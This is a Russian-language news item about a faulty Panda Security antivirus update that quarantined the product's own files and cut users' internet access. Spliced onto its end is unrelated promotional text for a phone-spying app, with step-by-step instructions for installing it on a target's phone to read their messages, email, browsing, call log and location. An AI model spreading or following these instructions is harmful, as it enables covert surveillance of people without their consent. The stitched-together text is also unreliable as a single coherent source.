Антивирус Panda Security заблокировал собственные файлы

3f400ecbc02cd7c1c65854d1fdb30902 Техническая поддержка Panda Antivirus оказалась завалена сообщениями от пользователей, в которых уведомляется о пропаже доступа к сети Интернет, или об общей нестабильности работы компьютера. Причина была выявлена достаточно быстро, заключалась она в неправильной установке собственных обновлений антивирусных баз данных. Программа неправильно распознавала информацию из скаченных файлов, интерпретируя их как вирусы. Об этом сбое сообщило специализированное издание The Register. Совсем скоро наличие проблемы подтвердили и в Panda Security. Как утверждают специалисты по безопасности, проблема находится под контролем и будет устранена в самое ближайшее время.

Как сообщил представитель Panda изданию The Register, 11 марта было выпущено обновление антивирусных баз и программного кода популярного антивируса. В результате допущенной ошибки некоторые файлы стали распознаваться программой как вредоносные. Пришлось своевременно выпустить заплатку, которая не только убирает предупреждения, но и восстанавливает всю информацию, которая совершенно случайно оказалась помещённой в карантин программы.

При более детальном расследовании оказалось, что проблема затрагивает не только основной программный продукт, а сразу несколько. Это Panda Cloud Office Protection, Panda Internet Security 2015 и Panda Global Protection 2015. Пользователям рекомендовано не выключать компьютеры, а также не совершать перезагрузку операционной системы до того момента, пока ПО автоматически не обновит себя правильными заплатками, решающими обнаруженную проблему. Если же перезагрузка будет произведена ранее, велик риск пропажи доступа в Интернет.

О проблеме изданию The Register рассказал один из его читателей. Он сообщил о массовой пропаже доступа в Сеть на компьютерах в его офисе, а также о многочисленных предупреждениях вирусной активности. Гипотетически неприятная ситуация может вывести из работы множество компаний. Следом на почтовый адрес техподдержки Panda Security полетели и другие запросы пользователей.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.